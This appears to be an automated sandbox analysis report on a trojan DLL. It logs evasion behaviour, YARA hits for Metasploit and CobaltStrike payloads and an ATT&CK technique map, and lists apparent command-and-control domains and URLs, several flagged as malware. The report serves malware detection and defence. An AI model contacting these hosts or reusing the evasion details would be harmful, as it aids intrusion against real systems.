                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39387Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34689Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41212Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35306Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36113Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44451Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44002Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34889Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37301Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30890Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39251Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37667Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33391Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34590Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37221Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31275Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43403Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42938Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43729Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32680Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38620Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33009Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34668Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32441Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39493Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40555Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35008Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38823Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38501Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39882Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34591Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37636Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36974Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34847Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31728Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41887Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44585Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38598Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32366Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43497Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41677Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40858Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44908Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31040Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34510Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44802Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31888Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30663Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41020Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43897Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38718Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36873Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31224Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32067Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34611Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41748Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34000Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35422Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40403Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44885Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34975Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35503Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34739Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35501Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40215Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37460Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43089Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40844Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32455Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34475Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44090Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38291Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39913Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32697Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39411Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38350Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40576Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39408Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40852Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44638Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32580Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42823Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32155Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33625Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41754Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41681Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43341Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44082Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38359Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39329Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32906Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36881Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38243Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36517Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33934Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39064Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39057Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32868Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32209Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35344Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33498Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34405Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43822Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31742Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41976Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34340Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32625Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36414Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43713Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42583Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36476Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42197Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34862Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32809Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39806Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40117Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44355Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38138Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31075Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43753Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43990Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43044Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36037Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38678Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32126Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44450Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44799Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38523Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38741Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35626Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33137Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32007Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32287Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38936Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32274Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32972Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 35138Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44155Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33642Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36809Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38133Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40317Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34721Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44762Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41348Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42440Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37233Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32979Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44544Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38659Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32529Jump to behavior
                  Source: WerFault.exe, 00000006.00000002.282995617.0000000004EF8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00967154 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SendMessageA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,EndDeferWindowPos,GetProcAddress,BeginDeferWindowPos,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00967154
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B29BA1 mov eax, dword ptr fs:[00000030h]0_3_03B29BA1
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeMemory protected: page write copy | page execute and write copy | page guardJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1Jump to behavior
                  Source: loaddll32.exe, 00000000.00000002.517830788.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.254606173.0000000003030000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                  Source: loaddll32.exe, 00000000.00000002.517830788.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.254606173.0000000003030000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: loaddll32.exe, 00000000.00000002.517830788.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.254606173.0000000003030000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: loaddll32.exe, 00000000.00000002.517830788.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.254606173.0000000003030000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_009454B4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetACP,3_2_0094C330
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_009455C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_0094AD88
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_0094ADD4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_00945DC8
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04578325 cpuid 3_2_04578325
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00949854 GetLocalTime,3_2_00949854
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0094BD4C GetVersionExA,3_2_0094BD4C
                  Source: C:\Windows\System32\loaddll32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior

                  Remote Access Functionality:

                  barindex
                  Yara detected Metasploit PayloadShow sources
                  Source: Yara matchFile source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmp, type: MEMORY
                  Yara detected CobaltStrikeShow sources
                  Source: Yara matchFile source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsNative API1Application Shimming1Application Shimming1Disable or Modify Tools11Input Capture11System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection12Deobfuscate/Decode Files or Information1LSASS MemoryPeripheral Device Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery25Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptModify Registry1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion11Cached Domain CredentialsSecurity Software Discovery121VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemVirtualization/Sandbox Evasion11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  p2SijKiqgZ.dll16%ReversingLabsWin32.Trojan.Convagent

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.2.loaddll32.exe.810000.0.unpack100%AviraHEUR/AGEN.1108767Download File
                  3.0.rundll32.exe.940000.4.unpack100%AviraHEUR/AGEN.1108767Download File
                  3.0.rundll32.exe.940000.0.unpack100%AviraHEUR/AGEN.1108767Download File
                  3.2.rundll32.exe.940000.0.unpack100%AviraHEUR/AGEN.1108767Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  lendbiz.vn0%VirustotalBrowse
                  hoteloaktree.com0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://mohsinkhanfoundation.com/pcQLeLMbur/GAUAID5zCzE+BzoOJAtGenN5Yn59cmV+YXw=0%Avira URL Cloudsafe
                  http://hoteloaktree.com/QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/HiYFeTpyPng4KCF4Pzk8EQgqOQkgOA0PBUJ7cn5henxzYn1lfQ==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/eDkkAA0bInx9RnpzeWJ+fXJlfmF80%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/EgwSFkZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  mohsinkhanfoundation.com/pcQLeLMbur0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  hoteloaktree.com/QthLWsZsVgb0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/eX0ALgEICTI4BRlyQn12eWR6endleGV70%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfw100%Avira URL Cloudmalware
                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.js100%Avira URL Cloudmalware
                  1110%Avira URL Cloudsafe
                  http://ctldl.winI0%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com:8080/100%Avira URL Cloudmalware
                  http://lendbiz.vn/xj3BhHtMbf/OTo6JTgvJXgEPS9DenV9ZXt9dGF5ZHw=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/LDhzdH4lGnwaNw4PfworLCkHdSkEGjIvdnMoAkV+cnhlfXlzZHlieA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/CXwgNgIIIXMeeQkPPhYCOUN6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/P34KJnkbASUWPzEYIgcWQntyfmF6fHNifWV90%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/AjlCfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/P3glHSkheRgAfBMIMgUiKCMaGD4dK0J9dnlkenp3ZXhlew==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/CAsZDz1/MEJ9dnlkenp3ZXhlew==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/Hh4hIBsEGSF/JgN9ARgdOCgSRX5yeGV9eXNkeWJ40%Avira URL Cloudsafe
                  http://r3.i.lencr.org/00%URL Reputationsafe
                  tuxsecuritybiness.com100%Avira URL Cloudmalware
                  http://mohsinkhanfoundation.com/pcQLeLMbur/HDN9NScAAw8PKwEFMi0/JTI5PEZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  nuevainfotech.com/xCNyTjzkoe0%Avira URL Cloudsafe
                  aterwellnessinc.com/U7D0sswwp0%Avira URL Cloudsafe
                  geosever.rs/ObHP1CHt0%Avira URL Cloudsafe
                  http://r3.i.lencr.org/0%URL Reputationsafe
                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.com100%Avira URL Cloudmalware
                  http://mohsinkhanfoundation.com/pcQLeLMbur/egl7fAgEMAQAAkJ7cn5henxzYn1lfQ==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/DClzfTsJDgA/AicrERgXCHsERX5yeGV9eXNkeWJ40%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/enl4GDYcBgIOewx5OBp/MiEbKDx8AkJ9dnlkenp3ZXhlew==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/MyYYFB8/BgEuIANyGHgkPAMsGDcYQ3p1fWV7fXRheWR80%Avira URL Cloudsafe
                  http://x1.c.lencr.org/00%URL Reputationsafe
                  http://x1.i.lencr.org/00%URL Reputationsafe
                  armordetailing.rs/lgfrZb4Re6WO0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/H0N6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  http://r3.o.lencr.org00%URL Reputationsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/ES1CfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/JS4leCwTGiojLgAhfiAeJXl4JCkFHUJ9dnlkenp3ZXhlew==0%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com/v100%Avira URL Cloudmalware
                  http://mohsinkhanfoundation.com/pcQLeLMbur/GB0tLyckQ3p1fWV7fXRheWR80%Avira URL Cloudsafe
                  erogholding.com/GFM1QcCFk0%Avira URL Cloudsafe
                  http://lendbiz.vn/xj3BhHtMbf/EQsPOCI9HT0CfXsGCQQcIA59PT18Q3p1fWV7fXRheWR80%Avira URL Cloudsafe
                  http://x1.i.lencr.org/0%URL Reputationsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/OhpCfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  lendbiz.vn/xj3BhHtMbf0%Avira URL Cloudsafe
                  http://sirifinco.com/Urbhq9wO50j/ASk5Kx0SPR8lJjE5eTg9GkN6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  http://sirifinco.com/Urbhq9wO50j/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/Hh8fPwgIJRkuIzgrOjp5HjovOkZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/ICYbCzstHxl+BhF4Jg5+GH0FRX5yeGV9eXNkeWJ40%Avira URL Cloudsafe
                  lefrenchwineclub.com/eRUGdDox0%Avira URL Cloudsafe
                  http://cps.letsencrypt.org00%URL Reputationsafe
                  acdlimited.com/2u6aW9Pfe0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/JhANAzl6Gw8FBhMABRYGcn9CfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/GzsaeR8FDw4qOh8mCAR2HDoCFS4bAhxFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  ordpress17.com/5WG6Z62sKWo0%Avira URL Cloudsafe
                  jornaldasoficinas.com/ZF8GKIGVDupL0%Avira URL Cloudsafe
                  sirifinco.com/Urbhq9wO50j0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/DxMffwwOHXMHeXJDenV9ZXt9dGF5ZHw=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/EgwECwQhMhk+BQkuH38nHQUtIy4GLwpFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/fxgDNT4yEngregozMnp+J0N6dX1le310YXlkfA==0%Avira URL Cloudsafe
                  https://23.82.140.206:8080/mpersonation0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/KQsyKkZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  http://lendbiz.vn/xj3BhHtMbf/cxAvGkZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  sjgrand.lk/zvMYuQqEZj0%Avira URL Cloudsafe
